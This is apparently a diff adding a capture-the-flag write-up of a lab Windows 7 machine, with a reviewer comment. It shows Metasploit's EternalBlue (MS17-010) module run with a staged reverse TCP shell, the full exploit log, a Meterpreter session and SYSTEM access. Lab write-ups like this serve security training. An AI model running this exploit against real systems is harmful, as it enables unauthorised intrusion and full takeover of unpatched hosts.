content/post/blue-boot2-root-writeup.md

```diff
@@ -0,0 +1,699 @@
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
+```
+
+I left the default payload as the staged reverse TCP shell and decided to kick off an attack to see if I could get a shell.
+
+```
+msf5 exploit(windows/smb/ms17_010_eternalblue) > run -j
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 10.10.100.83:4444 
+[*] 10.10.201.83:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
+[+] 10.10.201.83:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
+[*] 10.10.201.83:445      - Scanned 1 of 1 hosts (100% complete)
+[*] 10.10.201.83:445 - Connecting to target for exploitation.
+[+] 10.10.201.83:445 - Connection established for exploitation.
+[+] 10.10.201.83:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.10.201.83:445 - CORE raw buffer dump (42 bytes)
+[*] 10.10.201.83:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
+[*] 10.10.201.83:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
+[*] 10.10.201.83:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
+[+] 10.10.201.83:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.10.201.83:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.10.201.83:445 - Sending all but last fragment of exploit packet
+[*] 10.10.201.83:445 - Starting non-paged pool grooming
+[+] 10.10.201.83:445 - Sending SMBv2 buffers
+[+] 10.10.201.83:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.10.201.83:445 - Sending final SMBv2 buffers.
+[*] 10.10.201.83:445 - Sending last fragment of exploit packet!
+[*] 10.10.201.83:445 - Receiving response from exploit packet
+[+] 10.10.201.83:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.10.201.83:445 - Sending egg to corrupted connection.
+[*] 10.10.201.83:445 - Triggering free of corrupted buffer.
+[*] Sending stage (201283 bytes) to 10.10.201.83
+[*] Meterpreter session 1 opened (10.10.100.83:4444 -> 10.10.201.83:49198) at 2020-11-11 02:08:15 +0000
+[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[+] 10.10.201.83:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+```
+
+```
+msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1 
+[*] Starting interaction with 1...
+
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+```
+
+SUCCESS! And it left me with `NT AUTHORITY\SYSTEM` credentials. At this point the machine was mine, but I decided to make sure I had a stable foothold on the machine before proceeding with searching for the flags.
```

Comment:
At this point the machine was mine, but I had to make sure that I had a stable foothold on the machine before proceeding to search for flags.